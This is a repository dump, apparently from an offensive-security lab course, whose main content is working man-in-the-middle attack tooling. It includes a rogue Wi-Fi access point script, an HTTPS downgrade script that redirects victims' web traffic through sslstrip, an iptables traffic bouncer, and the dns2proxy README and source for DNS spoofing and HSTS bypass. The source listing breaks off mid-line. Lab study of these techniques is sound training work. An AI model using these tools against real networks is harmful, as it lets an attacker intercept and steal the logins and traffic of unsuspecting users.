├── README.md ├── lab2 └── hotspot.sh ├── lab3 └── http-downgrade.sh ├── lab4 ├── dns2proxy │ ├── .gitignore │ ├── IPBouncer.sh │ ├── README.md │ ├── __init__.py │ ├── dns2proxy.py │ ├── dnsalert.txt │ ├── dnslog.txt │ ├── domains.cfg │ ├── fhtagn.sh │ ├── ia.sh │ ├── nospoof.cfg │ ├── nospoofto.cfg │ ├── resolv.conf │ ├── spoof.cfg │ ├── transform.cfg │ └── victims.cfg ├── partial-hsts-bypass.sh └── sslstrip2 │ ├── .gitignore │ ├── COPYING │ ├── README │ ├── README.md │ ├── build │ ├── lib.linux-i686-2.6 │ │ └── sslstrip │ │ │ ├── ClientRequest.py │ │ │ ├── CookieCleaner.py │ │ │ ├── DnsCache.py │ │ │ ├── SSLServerConnection.py │ │ │ ├── ServerConnection.py │ │ │ ├── ServerConnectionFactory.py │ │ │ ├── StrippingProxy.py │ │ │ ├── URLMonitor.py │ │ │ └── __init__.py │ ├── lib.linux-i686-2.7 │ │ └── sslstrip │ │ │ ├── ClientRequest.py │ │ │ ├── CookieCleaner.py │ │ │ ├── DnsCache.py │ │ │ ├── SSLServerConnection.py │ │ │ ├── ServerConnection.py │ │ │ ├── ServerConnectionFactory.py │ │ │ ├── StrippingProxy.py │ │ │ ├── URLMonitor.py │ │ │ └── __init__.py │ ├── scripts-2.6 │ │ └── sslstrip │ └── scripts-2.7 │ │ └── sslstrip │ ├── debug_ssl.log │ ├── lock.ico │ ├── poc.log │ ├── setup.py │ ├── sslstrip.log │ ├── sslstrip.py │ └── sslstrip │ ├── ClientRequest.py │ ├── CookieCleaner.py │ ├── DnsCache.py │ ├── SSLServerConnection.py │ ├── ServerConnection.py │ ├── ServerConnectionFactory.py │ ├── StrippingProxy.py │ ├── URLMonitor.py │ └── __init__.py ├── lab5 └── instructions.txt ├── lab6 └── instructions.txt └── lab7 └── instructions.txt /README.md: -------------------------------------------------------------------------------- 1 | # awae -------------------------------------------------------------------------------- /lab2/hotspot.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # PHY == the network card used to create our access point 4 | phy=wlan0 5 | 6 | # upstream == the network card that serves as our 
interface to the network 7 | # gateway. To build our NAT, we route packets between PHY and upstream. 8 | upstream=eth0 9 | 10 | # Set bssid to mac addess... really this could be set to any valid bssid. 11 | bssid="$(macchanger -s wlan0 | tail -n1 | awk '{ print $3 }')" 12 | 13 | # set the essid to the first command line argument 14 | essid="$1" 15 | 16 | # set the essid to the second command line argument 17 | channel="$2" 18 | 19 | echo "[*] Starting hotspot script..." 20 | echo "[*] Using configs:" 21 | 22 | echo "[*] --> essid: $essid" 23 | echo "[*] --> bssid: $bssid" 24 | echo "[*] --> channel: $channel" 25 | echo "[*] --> AP interface: $phy" 26 | echo "[*] --> upstream interface: $upstream" 27 | 28 | # Mercilessly destroy interfering processes. There is a more elegent 29 | # way to do this using nmcli, but ain't nobody got time for that shit. ;) 30 | 31 | echo "[*] Stopping NetworkManager..." 32 | systemctl stop network-manager 33 | sleep 3 34 | 35 | # Stopping network-manager will push a soft block on our wireless interfaces. 36 | # We need to undo that. 37 | echo "[*] Removing soft block on wireless interfaces..." 38 | rfkill unblock wlan 39 | 40 | # Stopping network-manager will also disable all of our network interfaces. 41 | # Let's reenable them. 42 | echo "[*] Reenabling $phy interface" 43 | ifconfig $phy up 44 | 45 | # Next we create a hostapd config file. We start by giving hostapd 46 | # an interface with which to create an access point. 47 | echo "[*] Creating hostapd config file...." 48 | echo "interface=$phy" > hostapd.conf 49 | 50 | # Next we specify our ESSID, BSSID, and channel information. 51 | echo "ssid=$essid" >> hostapd.conf 52 | echo "bssid=$bssid" >> hostapd.conf 53 | echo "channel=$channel" >> hostapd.conf 54 | 55 | # Finally, set the hardware mode to g for compatibility with our 56 | # TP-Link cards. 57 | echo "hw_mode=g" >> hostapd.conf 58 | 59 | # Now that we have a config file, start hostapd as a background process. 
60 | echo "[*] Starting hostapd" 61 | hostapd ./hostapd.conf & 62 | sleep 7 63 | 64 | 65 | echo "[*] AP started, using IP 10.0.0.1, network 10.0.0.0/24" 66 | # Give our new AP an IP address and subnet mask 67 | ifconfig $phy 10.0.0.1 netmask 255.255.255.0 68 | 69 | # Update routing table to allow rogue AP to serve as default gateway 70 | # of its subnet 71 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 72 | 73 | # Next we create our dnsmasq. Remember we're only using dnsmasq as 74 | # a DHCP server at this time. 75 | 76 | echo "[*] Creating dnsmasq config file..." 77 | # The first line in our config defines a DHCP pool of 10.0.0.80 through 78 | # 10.0.0.254, with a DHCP lease 6 hours. 79 | echo "dhcp-range=10.0.0.80,10.0.0.254,6h" > dnsmasq.conf 80 | 81 | # The next line tells dnsmasq to issue a DHCP option that instructs 82 | # new members of the 10.0.0.0/24 network to use Google (8.8.8.8) as 83 | # a DNS server. 84 | echo "dhcp-option=6,8.8.8.8" >> dnsmasq.conf 85 | 86 | # Next, we add a line that tells dnsmasq to issue a DHCP option that 87 | # instructs new member of 10.0.0.0/24 to use our rogue AP as a gateway. 88 | echo "dhcp-option=3,10.0.0.1" >> dnsmasq.conf 89 | 90 | # The next two lines tell dnsmasq to act as an authoritative DHCP server 91 | # and to log DHCP queries. 92 | echo "dhcp-authoritative" >> dnsmasq.conf 93 | echo "log-queries" >> dnsmasq.conf 94 | 95 | 96 | # Finally we start dnsmasq, telling it to use our config file. By default, 97 | # dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do 98 | # this, we keep it from doing so using the -z flag. Additionally, we use 99 | # the -i flag to force dnsmasq to only listen on our $Phy interface. 100 | # We use the -I flag to explicity forbid dnsmasq from running on our 101 | # local interface. 102 | 103 | echo "[*] Starting dnsmasq as DHCP server... 
DNS set to 8.8.8.8" 104 | dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo 105 | 106 | # We enable packet forwarding by interacing with the /proc file system. 107 | echo "[*] Enabling packet forwarding" 108 | echo '1' > /proc/sys/net/ipv4/ip_forward 109 | 110 | echo "[*] Performing iptables magic" 111 | 112 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 113 | # all by default. 114 | iptables --policy INPUT ACCEPT 115 | iptables --policy FORWARD ACCEPT 116 | iptables --policy OUTPUT ACCEPT 117 | 118 | # We then flush all tables to give ourselves a clean slate. 119 | iptables --flush 120 | iptables --table nat --flush 121 | 122 | 123 | # Next we append a rule to the POSTROUTING chain of iptables. Changes 124 | # made to the POSTROUTING chain are not visible to the Linux kernel since 125 | # the chain is applied to every packet before it leaves the system. The rule 126 | # chain that we append to is called MASQUERADE. When applied to a packet, 127 | # the MASQUERADE chain sets the source IP address to the outbound NIC's 128 | # external IP address. This effectively creates an NAT. 129 | 130 | # To summarize, we tell iptables to change the source IP address of each packet 131 | # to that of eth0 and to send each packet to eth0 after this modification 132 | # occurs. 133 | iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE 134 | iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT 135 | 136 | read -p 'Hotspot ready. Press enter to quit...' 137 | 138 | # kill the daemon processes that we started earlier 139 | echo "[*] Killing daemons" 140 | for i in `pgrep dnsmasq`; do kill $i; done 141 | for i in `pgrep hostapd`; do kill $i; done 142 | sleep 5 143 | 144 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 145 | # all by default. 
146 | echo "[*] Restoring iptables" 147 | iptables --policy INPUT ACCEPT 148 | iptables --policy FORWARD ACCEPT 149 | iptables --policy OUTPUT ACCEPT 150 | 151 | # We then flush all tables to give ourselves a clean slate. 152 | iptables --flush 153 | iptables --table nat --flush 154 | -------------------------------------------------------------------------------- /lab3/http-downgrade.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # PHY == the network card used to create our access point 4 | phy=wlan0 5 | 6 | # upstream == the network card that serves as our interface to the network 7 | # gateway. To build our NAT, we route packets between PHY and upstream. 8 | upstream=eth0 9 | 10 | # Set bssid to mac addess... really this could be set to any valid bssid. 11 | bssid="$(macchanger -s wlan0 | tail -n1 | awk '{ print $3 }')" 12 | 13 | # set the essid to the first command line argument 14 | essid="$1" 15 | 16 | # set the essid to the second command line argument 17 | channel="$2" 18 | 19 | echo "[*] Starting hotspot script..." 20 | echo "[*] Using configs:" 21 | 22 | echo "[*] --> essid: $essid" 23 | echo "[*] --> bssid: $bssid" 24 | echo "[*] --> channel: $channel" 25 | echo "[*] --> AP interface: $phy" 26 | echo "[*] --> upstream interface: $upstream" 27 | 28 | # Mercilessly destroy interfering processes. There is a more elegent 29 | # way to do this using nmcli, but ain't nobody got time for that shit. ;) 30 | 31 | echo "[*] Stopping NetworkManager..." 32 | systemctl stop network-manager 33 | sleep 3 34 | 35 | # Stopping network-manager will push a soft block on our wireless interfaces. 36 | # We need to undo that. 37 | echo "[*] Removing soft block on wireless interfaces..." 38 | rfkill unblock wlan 39 | 40 | # Stopping network-manager will also disable all of our network interfaces. 41 | # Let's reenable them. 
42 | echo "[*] Reenabling $phy interface" 43 | ifconfig $phy up 44 | 45 | # Next we create a hostapd config file. We start by giving hostapd 46 | # an interface with which to create an access point. 47 | echo "[*] Creating hostapd config file...." 48 | echo "interface=$phy" > hostapd.conf 49 | 50 | # Next we specify our ESSID, BSSID, and channel information. 51 | echo "ssid=$essid" >> hostapd.conf 52 | echo "bssid=$bssid" >> hostapd.conf 53 | echo "channel=$channel" >> hostapd.conf 54 | 55 | # Finally, set the hardware mode to g for compatibility with our 56 | # TP-Link cards. 57 | echo "hw_mode=g" >> hostapd.conf 58 | 59 | # Now that we have a config file, start hostapd as a background process. 60 | echo "[*] Starting hostapd" 61 | hostapd ./hostapd.conf & 62 | sleep 7 63 | 64 | echo "[*] AP started, using IP 10.0.0.1, network 10.0.0.0/24" 65 | # Give our new AP an IP address and subnet mask 66 | ifconfig $phy 10.0.0.1 netmask 255.255.255.0 67 | 68 | # Update routing table to allow rogue AP to serve as default gateway 69 | # of its subnet 70 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 71 | 72 | # Next we create our dnsmasq. Remember we're only using dnsmasq as 73 | # a DHCP server at this time. 74 | 75 | echo "[*] Creating dnsmasq config file..." 76 | # The first line in our config defines a DHCP pool of 10.0.0.80 through 77 | # 10.0.0.254, with a DHCP lease 6 hours. 78 | echo "dhcp-range=10.0.0.80,10.0.0.254,6h" > dnsmasq.conf 79 | 80 | # The next line tells dnsmasq to issue a DHCP option that instructs 81 | # new members of the 10.0.0.0/24 network to use Google (8.8.8.8) as 82 | # a DNS server. 83 | echo "dhcp-option=6,8.8.8.8" >> dnsmasq.conf 84 | 85 | # Next, we add a line that tells dnsmasq to issue a DHCP option that 86 | # instructs new member of 10.0.0.0/24 to use our rogue AP as a gateway. 
87 | echo "dhcp-option=3,10.0.0.1" >> dnsmasq.conf 88 | 89 | # The next two lines tell dnsmasq to act as an authoritative DHCP server 90 | # and to log DHCP queries. 91 | echo "dhcp-authoritative" >> dnsmasq.conf 92 | echo "log-queries" >> dnsmasq.conf 93 | 94 | 95 | # Finally we start dnsmasq, telling it to use our config file. By default, 96 | # dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do 97 | # this, we keep it from doing so using the -z flag. Additionally, we use 98 | # the -i flag to force dnsmasq to only listen on our $Phy interface. 99 | # We use the -I flag to explicity forbid dnsmasq from running on our 100 | # local interface. 101 | 102 | echo "[*] Starting dnsmasq as DHCP server... DNS set to 8.8.8.8" 103 | dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo 104 | 105 | # We enable packet forwarding by interacing with the /proc file system. 106 | echo "[*] Enabling packet forwarding" 107 | echo '1' > /proc/sys/net/ipv4/ip_forward 108 | 109 | echo "[*] Performing iptables magic" 110 | 111 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 112 | # all by default. 113 | iptables --policy INPUT ACCEPT 114 | iptables --policy FORWARD ACCEPT 115 | iptables --policy OUTPUT ACCEPT 116 | 117 | # We then flush all tables to give ourselves a clean slate. 118 | iptables --flush 119 | iptables --table nat --flush 120 | 121 | 122 | # Next we append a rule to the POSTROUTING chain of iptables. Changes 123 | # made to the POSTROUTING chain are not visible to the Linux kernel since 124 | # the chain is applied to every packet before it leaves the system. The rule 125 | # chain that we append to is called MASQUERADE. When applied to a packet, 126 | # the MASQUERADE chain sets the source IP address to the outbound NIC's 127 | # external IP address. This effectively creates an NAT. 
128 | 129 | # To summarize, we tell iptables to change the source IP address of each packet 130 | # to that of eth0 and to send each packet to eth0 after this modification 131 | # occurs. 132 | iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE 133 | iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT 134 | 135 | iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 10000 136 | iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000 137 | 138 | iptables --table nat --append POSTROUTING --jump MASQUERADE 139 | 140 | # remove this line if problems and see what happens 141 | #iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000 142 | 143 | sslstrip -l 10000 -p -w ./sslstrip.log 144 | 145 | read -p 'Hotspot ready. Press enter to quit...' 146 | 147 | # kill the daemon processes that we started earlier 148 | echo "[*] Killing daemons" 149 | killall dnsmasq 150 | killall hostapd 151 | sleep 5 152 | 153 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 154 | # all by default. 155 | echo "[*] Restoring iptables" 156 | iptables --policy INPUT ACCEPT 157 | iptables --policy FORWARD ACCEPT 158 | iptables --policy OUTPUT ACCEPT 159 | 160 | # We then flush all tables to give ourselves a clean slate. 
161 | iptables --flush 162 | iptables --table nat --flush 163 | -------------------------------------------------------------------------------- /lab4/dns2proxy/.gitignore: -------------------------------------------------------------------------------- 1 | .idea -------------------------------------------------------------------------------- /lab4/dns2proxy/IPBouncer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # TCP Proxy using IPTables 3 | # tcpproxy LOCAL_IP LOCAL_PORT REMOTE_IP REMOTE_PORT 4 | 5 | IPTABLES=/sbin/iptables 6 | 7 | echo 1 > /proc/sys/net/ipv4/ip_forward 8 | sysctl net.ipv4.conf.all.forwarding=1 9 | # Flush nat table 10 | $IPTABLES -t nat -F 11 | 12 | # tcpproxy LOCAL_IP LOCAL_PORT REMOTE_IP REMOTE_PORT 13 | listen_address=$1 14 | listen_port=$2 15 | source_address=$1 16 | # source_port=$4 17 | destination_address=$3 18 | destination_port=$4 19 | 20 | $IPTABLES -t nat -A PREROUTING --dst $listen_address -p tcp --dport $listen_port -j DNAT --to-destination $destination_address:$destination_port 21 | $IPTABLES -t nat -A POSTROUTING -j MASQUERADE 22 | -------------------------------------------------------------------------------- /lab4/dns2proxy/README.md: -------------------------------------------------------------------------------- 1 | dns2proxy 2 | ========= 3 | 4 | Offensive DNS server 5 | 6 | This tools offer a different features for post-explotation once you change the DNS server to a Victim. 7 | 8 | 9 | Feature 1 10 | --------- 11 | 12 | Traditional DNS Spoof adding to the response the original IP address. 
13 | 14 | Using spoof.cfg file: 15 | 16 | hostname ip.ip.ip.ip 17 | 18 | >root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg 19 | > 20 | >// launch in another terminal dns2proxy.py 21 | > 22 | >root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1 23 | >Server: 127.0.0.1 24 | >Address: 127.0.0.1#53 25 | > 26 | >Name: www.s21sec.com 27 | >Address: 1.1.1.1 28 | >Name: www.s21sec.com 29 | >Address: 88.84.64.30 30 | 31 | 32 | or you can use domains.cfg file to spoof all host of a same domain: 33 | 34 | >root@kali:~/demoBH/dns2proxy# cat dominios.cfg 35 | >.domain.com 192.168.1.1 36 | > 37 | >root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1 38 | >Server: 127.0.0.1 39 | >Address: 127.0.0.1#53 40 | > 41 | >Name: aaaa.domain.com 42 | >Address: 192.168.1.1 43 | 44 | Hostnames at nospoof.cfg will no be spoofed. 45 | 46 | Feature 2 47 | --------- 48 | 49 | This feature implements the attack of DNS spoofing adding 2 IP address at the top of the resolution and configuring the system to forward the connections. 50 | Check my slides at BlackHat Asia 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and the [Demo Video] (http://www.youtube.com/watch?v=cJtbxX1HS5I). 51 | 52 | To launch this attach there is a shellscript that automatically configure the system using IP tables. You must edit this file to adapt it to your system. DON´T FORGET AdminIP variable!!!! 
53 | Both IPs must be at the same system to let dns2proxy.py configurate the forwarding 54 | 55 | Usage: ia.sh < interface > [ip1] [ip2] 56 | 57 | 58 | >root@kali:~/dns2proxy# ./ia.sh eth0 172.16.48.128 172.16.48.230 59 | >Non spoofing imap.gmail.com 60 | >Non spoofing mail.s21sec.com 61 | >Non spoofing www.google.com 62 | >Non spoofing www.apple.com 63 | >Non spoofing ccgenerals.ms19.gamespy.com 64 | >Non spoofing master.gamespy.com 65 | >Non spoofing gpcm.gamespy.com 66 | >Non spoofing launch.gamespyarcade.com 67 | >Non spoofing peerchat.gamespy.com 68 | >Non spoofing gamestats.gamespy.com 69 | >Specific host spoofing www.s21sec.com with 1.1.1.1 70 | >Specific domain IP .domain.com with 192.168.1.1 71 | >binded to UDP port 53. 72 | >waiting requests. 73 | >Starting sniffing in (eth0 = 172.16.48.128).... 74 | > 75 | >< at other terminal > 76 | > 77 | >root@kali:~/dns2proxy# nslookup www.microsoft.com 127.0.0.1 78 | >Server: 127.0.0.1 79 | >Address: 127.0.0.1#53 80 | > 81 | >Name: www.microsoft.com 82 | >Address: 172.16.48.128 83 | >Name: www.microsoft.com 84 | >Address: 172.16.48.230 85 | >Name: www.microsoft.com 86 | >Address: 65.55.57.27 87 | 88 | 89 | The fhtang.sh script will terminate the program and restore normal iptables. 90 | 91 | Hostnames at nospoof.cfg will no be spoofed. 92 | 93 | 94 | Feature 3 95 | --------- 96 | 97 | Automatically the dns server detects and correct the changes thats my sslstrip+ do to the hostnames to avoid HSTS, so will response properly. 98 | 99 | This server is necesary to make the sslstrip+ attack. 
100 | 101 | >root@kali:~/dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS response like accounts.google.com 102 | >Server: 127.0.0.1 103 | >Address: 127.0.0.1#53 104 | > 105 | >Name: webaccounts.google.com 106 | >Address: 172.16.48.128 107 | >Name: webaccounts.google.com 108 | >Address: 172.16.48.230 109 | >Name: webaccounts.google.com 110 | >Address: 74.125.200.84 111 | > 112 | >root@kali:~/dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Take care of the 4 w! DNS response like 113 | >Server: 127.0.0.1 www.yahoo.com 114 | >Address: 127.0.0.1#53 115 | > 116 | >Name: wwww.yahoo.com 117 | >Address: 172.16.48.128 118 | >Name: wwww.yahoo.com 119 | >Address: 172.16.48.230 120 | >Name: wwww.yahoo.com 121 | >Address: 68.142.243.179 122 | >Name: wwww.yahoo.com 123 | >Address: 68.180.206.184 124 | 125 | 126 | Installation 127 | ------------ 128 | 129 | dnspython (www.dnspython.com) is needed. 130 | Tested with Python 2.6 and Python 2.7. 131 | 132 | 133 | Importing Dns2Proxy as a Python module 134 | -------------------------------------- 135 | 136 | Dns2proxy can be imported and run within a Python script or larger project. To use Dns2proxy as a module, 137 | first import it within your project file: 138 | 139 | ```python 140 | 141 | import dns2proxy 142 | 143 | ``` 144 | 145 | Then start it by making a call to dns2proxy.run() as shown below, passing your network interface as an argument: 146 | 147 | ```python 148 | 149 | import dns2proxy 150 | dns2proxy.run(interface='wlan0') 151 | 152 | ``` 153 | 154 | Note that dns2proxy.run() is a blocking call, and that running dns2proxy in parallel with other modules such as 155 | sslstrip2 requires the use of daemon processes. 
For example: 156 | 157 | 158 | ```python 159 | 160 | import dns2proxy 161 | from multiprocessing import Process 162 | 163 | def run_dns2proxy(interface): 164 | 165 | dns2proxy.run(interface=interface) 166 | 167 | p = Process(target=dns2proxy.run, args=('wlan0',)) 168 | p.start() 169 | 170 | print 'Run the rest of your code here' 171 | 172 | p.stop() 173 | 174 | 175 | ``` 176 | 177 | 178 | Config files description 179 | ------------------------ 180 | 181 | domains.cfg (or dominios.cfg): resolve all hosts for the listed domains with the listed IP 182 | >Ex: 183 | >.facebook.com 1.2.3.4 184 | >.fbi.gov 1.2.3.4 185 | 186 | spoof.cfg : Spoof a host with a ip 187 | >Ex: 188 | >www.nsa.gov 127.0.0.1 189 | 190 | nospoof.cfg: Send always a legit response when asking for these hosts. 191 | >Ex. 192 | >mail.google.com 193 | 194 | nospoofto.cfg: Don't send fake responses to the IPs listed there. 195 | >Ex: 196 | >127.0.0.1 197 | >4.5.6.8 198 | 199 | victims.cfg: If not empty, only send fake responses to these IP addresses. 200 | >Ex: 201 | >23.66.163.36 202 | >195.12.226.131 203 | 204 | resolv.conf: DNS server to forward the queries. 205 | >Ex: 206 | >nameserver 8.8.8.8 207 | 208 | -------------------------------------------------------------------------------- /lab4/dns2proxy/__init__.py: -------------------------------------------------------------------------------- 1 | from dns2proxy import run 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/dns2proxy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.6 2 | ''' 3 | dns2proxy for offensive cybersecurity v1.0 4 | 5 | 6 | python dns2proxy.py -h for Usage. 
7 | 8 | Example: 9 | python2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200 10 | 11 | Example for no forwarding (only configured domain based queries and spoofed hosts): 12 | python2.6 dns2proxy.py -i eth0 -noforward 13 | 14 | Example for no forwarding but add IPs 15 | python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward 16 | 17 | Author: Leonardo Nve ( leonardo.nve@gmail.com) 18 | ''' 19 | 20 | 21 | import dns.message 22 | import dns.rrset 23 | import dns.resolver 24 | import socket 25 | import numbers 26 | import threading 27 | from struct import * 28 | import datetime 29 | import pcapy 30 | import os 31 | import signal 32 | import errno 33 | from time import sleep 34 | import argparse 35 | 36 | 37 | consultas = {} 38 | spoof = {} 39 | dominios = {} 40 | transformation = {} 41 | nospoof = [] 42 | nospoofto = [] 43 | victims = [] 44 | Forward = None 45 | 46 | configs_path = os.path.dirname(os.path.realpath(__file__)) 47 | 48 | LOGREQFILE = "%s/dnslog.txt" % configs_path 49 | LOGSNIFFFILE = "%s/snifflog.txt" % configs_path 50 | LOGALERTFILE = "%s/dnsalert.txt" % configs_path 51 | RESOLVCONF = "%s/resolv.conf" % configs_path 52 | victim_file = "%s/victims.cfg" % configs_path 53 | nospoof_file = "%s/nospoof.cfg" % configs_path 54 | nospoofto_file = "%s/nospoofto.cfg" % configs_path 55 | specific_file = "%s/spoof.cfg" % configs_path 56 | dominios_file = "%s/domains.cfg" % configs_path 57 | transform_file = "%s/transform.cfg" % configs_path 58 | 59 | 60 | ###################### 61 | # GENERAL SECTION # 62 | ###################### 63 | 64 | 65 | def save_req(lfile, str): 66 | f = open(lfile, "a") 67 | f.write(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' ' + str) 68 | f.close() 69 | 70 | 71 | def SIGUSR1_handle(signalnum, frame): 72 | global noserv 73 | global Resolver 74 | noserv = 0 75 | DEBUGLOG('Reconfiguring....') 76 | process_files() 77 | Resolver.reset() 78 | Resolver.read_resolv_conf(RESOLVCONF) 79 | return 80 | 81 | 
82 | def process_files(): 83 | global nospoof 84 | global spoof 85 | global nospoof_file 86 | global specific_file 87 | global dominios_file 88 | global dominios 89 | global nospoofto_file 90 | global transform_file 91 | 92 | for i in nospoof[:]: 93 | nospoof.remove(i) 94 | 95 | for i in nospoofto[:]: 96 | nospoofto.remove(i) 97 | 98 | for i in victims[:]: 99 | victims.remove(i) 100 | 101 | dominios.clear() 102 | spoof.clear() 103 | 104 | nsfile = open(nospoof_file, 'r') 105 | for line in nsfile: 106 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 107 | continue 108 | h = line.split() 109 | if len(h) > 0: 110 | DEBUGLOG('Non spoofing ' + h[0]) 111 | nospoof.append(h[0]) 112 | 113 | nsfile.close() 114 | 115 | nsfile = open(victim_file, 'r') 116 | for line in nsfile: 117 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 118 | continue 119 | h = line.split() 120 | if len(h) > 0: 121 | DEBUGLOG('Spoofing only to ' + h[0]) 122 | victims.append(h[0]) 123 | 124 | nsfile.close() 125 | 126 | nsfile = open(nospoofto_file, 'r') 127 | for line in nsfile: 128 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 129 | continue 130 | h = line.split() 131 | if len(h) > 0: 132 | DEBUGLOG('Non spoofing to ' + h[0]) 133 | nospoofto.append(h[0]) 134 | 135 | nsfile.close() 136 | 137 | nsfile = open(specific_file, 'r') 138 | for line in nsfile: 139 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 140 | continue 141 | h = line.split() 142 | if len(h) > 1: 143 | DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1]) 144 | spoof[h[0]] = h[1] 145 | 146 | nsfile.close() 147 | nsfile = open(dominios_file, 'r') 148 | for line in nsfile: 149 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 150 | continue 151 | h = 
line.split() 152 | if len(h) > 1: 153 | DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1]) 154 | dominios[h[0]] = h[1] 155 | 156 | nsfile.close() 157 | 158 | nsfile = open(transform_file, 'r') 159 | for line in nsfile.readlines(): 160 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 161 | continue 162 | line = line.rstrip() 163 | from_host = line.split(':')[0] 164 | to_host = line.split(':')[1] 165 | transformation[from_host] = to_host 166 | 167 | nsfile.close() 168 | 169 | return 170 | 171 | 172 | def DEBUGLOG(str): 173 | global debug 174 | if debug: 175 | print str 176 | return 177 | 178 | 179 | def handler_msg(id): 180 | #os.popen('executeScript %s &'%id) 181 | return 182 | 183 | ###################### 184 | # SNIFFER SECTION # 185 | ###################### 186 | 187 | class ThreadSniffer(threading.Thread): 188 | def __init__(self): 189 | threading.Thread.__init__(self) 190 | 191 | def run(self): 192 | #DEBUGLOG( self.getName(), " Sniffer Waiting connections....") 193 | go() 194 | 195 | def go(): 196 | global ip1 197 | global dev 198 | bpffilter = "dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)" % ( 199 | ip1, ip1, adminip) 200 | cap = pcapy.open_live(dev, 255, 1, 0) 201 | cap.setfilter(bpffilter) 202 | DEBUGLOG( "Starting sniffing in (%s = %s)...." 
% (dev, ip1)) 203 | 204 | #start sniffing packets 205 | while True: 206 | try: 207 | (header, packet) = cap.next() 208 | parse_packet(packet) 209 | except: 210 | pass 211 | #DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen()))) 212 | 213 | #function to parse a packet 214 | def parse_packet(packet): 215 | eth_length = 14 216 | eth_protocol = 8 217 | global ip1 218 | global consultas 219 | global ip2 220 | 221 | #Parse IP packets, IP Protocol number = 8 222 | if eth_protocol == 8: 223 | #Parse IP header 224 | #take first 20 characters for the ip header 225 | ip_header = packet[eth_length:20 + eth_length] 226 | 227 | #now unpack them :) 228 | iph = unpack('!BBHHHBBH4s4s', ip_header) 229 | 230 | version_ihl = iph[0] 231 | #version = version_ihl >> 4 232 | ihl = version_ihl & 0xF 233 | 234 | iph_length = ihl * 4 235 | 236 | #ttl = iph[5] 237 | protocol = iph[6] 238 | s_addr = socket.inet_ntoa(iph[8]) 239 | d_addr = socket.inet_ntoa(iph[9]) 240 | 241 | 242 | 243 | #TCP protocol 244 | if protocol == 6: 245 | t = iph_length + eth_length 246 | tcp_header = packet[t:t + 20] 247 | 248 | #now unpack them :) 249 | tcph = unpack('!HHLLBBHHH', tcp_header) 250 | 251 | source_port = tcph[0] 252 | dest_port = tcph[1] 253 | # sequence = tcph[2] 254 | # acknowledgement = tcph[3] 255 | # doff_reserved = tcph[4] 256 | # tcph_length = doff_reserved >> 4 257 | 258 | 259 | 260 | if consultas.has_key(str(s_addr)): 261 | DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr)) 262 | DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port)) 263 | # print '>>>> '+str(s_addr)+' esta en la lista!!!!.....' 
264 | comando = 'sh ./IPBouncer.sh %s %s %s %s' % ( 265 | ip2, str(dest_port), consultas[str(s_addr)], str(dest_port)) 266 | os.system(comando) 267 | #print '>>>> ' + comando 268 | comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % ( 269 | ip1, str(dest_port), str(s_addr), str(source_port)) 270 | os.system(comando) 271 | comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % ( 272 | ip1, str(dest_port), str(s_addr), str(source_port)) 273 | os.system(comando) 274 | #print '>>>> ' + comando 275 | 276 | #UDP packets 277 | elif protocol == 17: 278 | u = iph_length + eth_length 279 | #udph_length = 8 280 | #udp_header = packet[u:u + 8] 281 | #now unpack them :) 282 | #udph = unpack('!HHHH', udp_header) 283 | #source_port = udph[0] 284 | #dest_port = udph[1] 285 | #length = udph[2] 286 | #checksum = udph[3] 287 | #DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum)) 288 | #h_size = eth_length + 